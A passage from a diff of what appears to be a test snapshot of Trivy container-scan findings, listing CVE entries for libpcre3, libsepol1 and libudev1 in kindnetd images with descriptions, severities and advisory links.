"foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", + ], + }, + "category": "Vulnerability", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "buffer overrun in format_timespan() function", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-11164", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://openwall.com/lists/oss-security/2017/07/11/3", - "http://www.openwall.com/lists/oss-security/2023/04/11/1", - "http://www.openwall.com/lists/oss-security/2023/04/12/1", - "http://www.securityfocus.com/bid/99575", - "https://access.redhat.com/security/cve/CVE-2017-11164", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", - "https://www.cve.org/CVERecord?id=CVE-2017-11164", - ], - }, - "category": "Vulnerability", - "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-11164", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/07/11/3", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/99575", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-11164", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-16231", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - "http://seclists.org/fulldisclosure/2018/Dec/33", - "http://www.openwall.com/lists/oss-security/2017/11/01/11", - "http://www.openwall.com/lists/oss-security/2017/11/01/3", - "http://www.openwall.com/lists/oss-security/2017/11/01/7", - "http://www.openwall.com/lists/oss-security/2017/11/01/8", - "http://www.securityfocus.com/bid/101688", - "https://access.redhat.com/security/cve/CVE-2017-16231", - "https://bugs.exim.org/show_bug.cgi?id=2047", - "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", - "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-16231", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + }, + { + "type": "URL", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2018/Dec/33", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/101688", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-16231", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7245", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7245", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7245", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7245", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", @@ -91467,57 +92281,82 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7246", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20386", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7246", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "https://access.redhat.com/security/cve/CVE-2019-20386", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "https://linux.oracle.com/cve/CVE-2019-20386.html", + "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "https://security.netapp.com/advisory/ntap-20200210-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-20386", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7246", + "value": "https://avd.aquasec.com/nvd/cve-2019-20386", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://access.redhat.com/security/cve/CVE-2019-20386", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4269-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4269-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", }, ], "severity": "LOW", @@ -91525,117 +92364,135 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20838", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://access.redhat.com/security/cve/CVE-2019-20838", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2019-20838.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2019-20838", - "https://www.pcre.org/original/changelog.txt", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20838", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20838", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://bugs.gentoo.org/717920", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -91643,368 +92500,453 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36084", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36084", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", - "https://linux.oracle.com/cve/CVE-2021-36084.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36084", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36084", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": 